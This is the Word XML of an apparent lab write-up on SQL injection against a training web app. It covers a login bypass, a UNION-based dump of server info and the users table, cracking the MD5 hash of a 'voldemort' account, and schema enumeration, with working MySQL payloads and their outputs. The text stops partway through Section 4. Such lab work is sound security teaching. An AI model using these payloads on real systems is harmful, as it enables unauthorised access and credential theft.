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6017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Basic Injection Page (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084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login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084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- Login Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30642920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Log into the system as the user "</w:t>
      </w:r>
      <w:proofErr w:type="spell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alice</w:t>
      </w:r>
      <w:proofErr w:type="spell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" without knowing her password, thereby bypassing the authentication mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8A7124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 &amp; Failed Attempts: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Initially, I attempted a standard SQL injection payload in the username field to comment out the password verification clause. I entered </w:t>
      </w:r>
      <w:proofErr w:type="spell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#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'</w:t>
      </w:r>
      <w:proofErr w:type="spell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along with a random password ("1234"). These attempts failed and returned </w:t>
      </w:r>
      <w:proofErr w:type="gram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a SQL</w:t>
      </w:r>
      <w:proofErr w:type="gram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syntax error instead of logging me in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1323349E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Analysis &amp; Information Gathering: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The server returned the following verbose error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A65043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You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '</w:t>
      </w:r>
      <w:proofErr w:type="spell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AND (password = '81dc9bdb52d04dc20036dbd8313ed055</w:t>
      </w:r>
      <w:proofErr w:type="gram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')'</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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 line 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F620364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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>This error was highly informative and revealed two critical pieces of information about the backend implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E28E021" w14:textId="77777777" w:rsidR="008440D9" w:rsidRPr="008440D9" w:rsidRDefault="008440D9" w:rsidP="008440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Structure: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The user input is wrapped in parentheses. The backend query likely looks </w:t>
      </w:r>
      <w:proofErr w:type="gram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users WHERE (username = '$user') AND (password = '$pass')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. My initial payload caused a syntax error because the comment </w:t>
      </w:r>
      <w:proofErr w:type="gram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symbol (</w:t>
      </w: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) was placed before closing the parenthesis, leaving an unclosed parenthesis in the executed query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612B32CB" w14:textId="77777777" w:rsidR="008440D9" w:rsidRPr="008440D9" w:rsidRDefault="008440D9" w:rsidP="008440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Hashing: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The random password I entered ("1234") was converted into an MD5 hash (</w:t>
      </w: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81dc9bdb52d04dc20036dbd8313ed055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) inside the query. This indicates that the application hashes the password </w:t>
      </w:r>
      <w:r w:rsidRPr="008440D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inserting it into the SQL query. Consequently, attempting to inject SQL commands via the password field is impossible, as the payload would simply be hashed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514889A9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 Exploitation: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error analysis, I crafted a refined payload for the Username field to properly close the syntax before commenting out the remainder of the query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D5F228" w14:textId="77777777" w:rsidR="008440D9" w:rsidRPr="008440D9" w:rsidRDefault="008440D9" w:rsidP="008440D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 Payload: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proofErr w:type="gram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#</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="38B7D999" w14:textId="77777777" w:rsidR="008440D9" w:rsidRPr="008440D9" w:rsidRDefault="008440D9" w:rsidP="008440D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(or any arbitrary string)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0023A019" w14:textId="77777777" w:rsidR="008440D9" w:rsidRP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of the successful payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C18691" w14:textId="77777777" w:rsidR="008440D9" w:rsidRPr="008440D9" w:rsidRDefault="008440D9" w:rsidP="008440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specifies the targeted account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28545E51" w14:textId="77777777" w:rsidR="008440D9" w:rsidRPr="008440D9" w:rsidRDefault="008440D9" w:rsidP="008440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closes</w:t>
      </w:r>
      <w:proofErr w:type="gram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gram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string literal</w:t>
      </w:r>
      <w:proofErr w:type="gram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31208" w14:textId="77777777" w:rsidR="008440D9" w:rsidRPr="008440D9" w:rsidRDefault="008440D9" w:rsidP="008440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closes</w:t>
      </w:r>
      <w:proofErr w:type="gram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the parenthesis for the username condition, fixing the previous syntax error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC7971F" w14:textId="77777777" w:rsidR="008440D9" w:rsidRPr="008440D9" w:rsidRDefault="008440D9" w:rsidP="008440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MySQL comment indicator, forcing the database to ignore the rest of the query (including the entire password verification clause).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FD4E69" w14:textId="77777777" w:rsid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0D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">The payload successfully executed, authenticating me and displaying the message "Welcome </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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alice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008440D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5B71D2" w14:textId="77777777" w:rsidR="001A054F" w:rsidRPr="001A054F" w:rsidRDefault="001A054F" w:rsidP="001A054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Section 2: Search Products (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A0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searchproducts.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A0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- Extracting Server Info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582A4520" w14:textId="77777777" w:rsidR="001A054F" w:rsidRPr="001A054F" w:rsidRDefault="001A054F" w:rsidP="001A054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Discover the connected hostname, username, and server version using the search interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AAD389" w14:textId="77777777" w:rsidR="001A054F" w:rsidRPr="001A054F" w:rsidRDefault="001A054F" w:rsidP="001A054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 &amp; Column Enumeration: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I began by exploiting the search field using a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UNION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based SQL injection. The first step was to determine the exact number of columns returned by the original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statement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8212B8" w14:textId="77777777" w:rsidR="001A054F" w:rsidRPr="001A054F" w:rsidRDefault="001A054F" w:rsidP="001A054F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I injected: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a%' UNION SELECT 1,2,3,4 #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>. This returned an error: "The used SELECT statements have a different number of columns".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251528E3" w14:textId="77777777" w:rsidR="001A054F" w:rsidRPr="001A054F" w:rsidRDefault="001A054F" w:rsidP="001A054F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I incremented the column count and injected: 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a%'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UNION SELECT 1,2,3,4,5 #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. This </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001A054F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>executed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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successfully, displaying numbers 2, 3, 4, and 5 in the HTML table. This confirmed the query returns exactly 5 columns, with column 1 being hidden from the frontend display.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CE52AC" w14:textId="77777777" w:rsidR="001A054F" w:rsidRPr="001A054F" w:rsidRDefault="001A054F" w:rsidP="001A054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Extraction &amp; Collation Error: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To extract the required information, I attempted to replace the visible columns (2, 3, 4) with system </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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functions: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671E5" w14:textId="77777777" w:rsidR="001A054F" w:rsidRPr="001A054F" w:rsidRDefault="001A054F" w:rsidP="001A054F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I injected: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a%' UNION SELECT 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@@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hostname, </w:t>
      </w:r>
      <w:proofErr w:type="spell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5 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068C16C4" w14:textId="77777777" w:rsidR="001A054F" w:rsidRPr="001A054F" w:rsidRDefault="001A054F" w:rsidP="001A054F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The server returned the following error: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 mix of collations (latin1_swedish_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ci,IMPLICIT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and (utf8_general_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ci,SYSCONST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for operation 'UNION'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21600" w14:textId="77777777" w:rsidR="001A054F" w:rsidRPr="001A054F" w:rsidRDefault="001A054F" w:rsidP="001A054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Analysis &amp; Resolution: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The error occurred because the original table columns are formatted in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latin1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, while the MySQL system functions return strings in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utf8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. To bypass this collation mismatch, I used the MySQL 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cast the output of the system variables into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latin1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on the fly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3322D733" w14:textId="77777777" w:rsidR="001A054F" w:rsidRPr="001A054F" w:rsidRDefault="001A054F" w:rsidP="001A054F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Payload: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a%' UNION SELECT 1, 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@@hostname using latin1), convert(</w:t>
      </w:r>
      <w:proofErr w:type="spell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using latin1), convert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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version(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001A05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using latin1), 5 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA687E8" w14:textId="77777777" w:rsidR="001A054F" w:rsidRPr="001A054F" w:rsidRDefault="001A054F" w:rsidP="001A054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The injection was successful, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001A054F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>bypassing</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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the collation error and populating the table with the requested server information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B8BAF4" w14:textId="77777777" w:rsidR="001A054F" w:rsidRPr="001A054F" w:rsidRDefault="001A054F" w:rsidP="001A054F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Hostname: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7b9d881ea85a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E8FD27" w14:textId="77777777" w:rsidR="001A054F" w:rsidRPr="001A054F" w:rsidRDefault="001A054F" w:rsidP="001A054F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A054F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>weak@%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1344AB32" w14:textId="77777777" w:rsidR="001A054F" w:rsidRPr="001A054F" w:rsidRDefault="001A054F" w:rsidP="001A054F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Version:</w:t>
      </w:r>
      <w:r w:rsidRPr="001A054F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8.0.23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BBA1E6" w14:textId="77777777" w:rsidR="008440D9" w:rsidRDefault="008440D9" w:rsidP="008440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CE6B58D" w14:textId="77777777" w:rsid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4206472" w14:textId="77777777" w:rsid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AE39893" w14:textId="77777777" w:rsid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BBC4254" w14:textId="77777777" w:rsidR="00B65341" w:rsidRP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Section 3: Discovering Voldemort's Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504935FB" w14:textId="77777777" w:rsidR="00B65341" w:rsidRP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Find the password for the user "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B65341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>voldemort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B65341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>" using the search interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A8B122" w14:textId="77777777" w:rsidR="00B65341" w:rsidRP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Building upon the column enumeration from Section 2 (which established that the query expects 5 columns), I utilized a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UNION SELECT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attack to dump the contents of the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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proofErr w:type="gramEnd"/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table. I specifically targeted the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columns. To prevent the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 mix of collations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error encountered previously, I applied the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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convert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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latin1)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the injected columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A01BC1" w14:textId="77777777" w:rsidR="00B65341" w:rsidRPr="00B65341" w:rsidRDefault="00B65341" w:rsidP="00B65341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Payload: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a%' UNION SELECT 1, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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convert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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username using latin1), </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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convert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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using latin1), 4, 5 FROM users #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5569A5" w14:textId="77777777" w:rsidR="00B65341" w:rsidRP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&amp; Hash Cracking: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The SQL injection was successful, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B65341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>bypassing</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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the original search query and appending the entire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table to the HTML results. I located the specific entry for the target user:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC2B111" w14:textId="77777777" w:rsidR="00B65341" w:rsidRPr="00B65341" w:rsidRDefault="00B65341" w:rsidP="00B6534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 (Product Name column):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341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>voldemort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="510F8FA6" w14:textId="77777777" w:rsidR="00B65341" w:rsidRPr="00B65341" w:rsidRDefault="00B65341" w:rsidP="00B6534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Hash (Product Type column):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856936b417f82c06139c74fa73b1abbe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D06AF2A" w14:textId="77777777" w:rsidR="00B65341" w:rsidRPr="00B65341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As discovered in the error analysis of Section 1, the application stores passwords as MD5 hashes. By recognizing the hash signature, I was able to determine that the MD5 hash </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65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856936b417f82c06139c74fa73b1abbe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corresponds to the plaintext string </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65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horcrux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (which is also hinted at on the application's homepage).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FC1227" w14:textId="71C50FE5" w:rsidR="00B65341" w:rsidRPr="008440D9" w:rsidRDefault="00B65341" w:rsidP="00B653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>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Final Password:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> horcrux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EFEAFD" w14:textId="77777777" w:rsidR="008440D9" w:rsidRDefault="008440D9" w:rsidP="008440D9">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB1E5B3" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="216A9001" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34E596C8" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43D5AC99" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CBCBF8A" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C2509E" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26AF94B7" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AB471B5" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27F1ED49" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="450924B7" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45806F33" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42D7C3DC" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AEBF7DD" w14:textId="2ECB285A" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Section 4: Enumerating Database Tables and Columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69909AFF" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Find the table </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>sqlitraining</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and enumerate all its fields using the search interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B970DF0" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Methodology &amp; Failed Attempt:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Initially, I attempted to directly query the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> table to extract the fields for the specified table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFEA035" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I injected: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">a%' UNION SELECT 1, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>convert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/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 xml:space="preserve"> using latin1), </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>convert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> using latin1), 4, 5 FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>sqlitraining</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>' #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6F54DA02" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">However, this payload returned no injected results. This indicated that the table </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>sqlitraining</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> did not actually exist in the database, suggesting a deliberate trap or misdirection in the assignment instructions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253C66E1" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database Enumeration (Pivoting):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> To discover the true name of the target table, I pivoted to enumerating all tables within the current database using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19438BCD" w14:textId="77777777" w:rsidR="00EA78B7" w:rsidRDefault="00EA78B7" w:rsidP="00EA78B7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I injected: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>a%'</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> UNION SELECT 1, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>convert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/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 xml:space="preserve"> using latin1), 3, 4, 5 FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
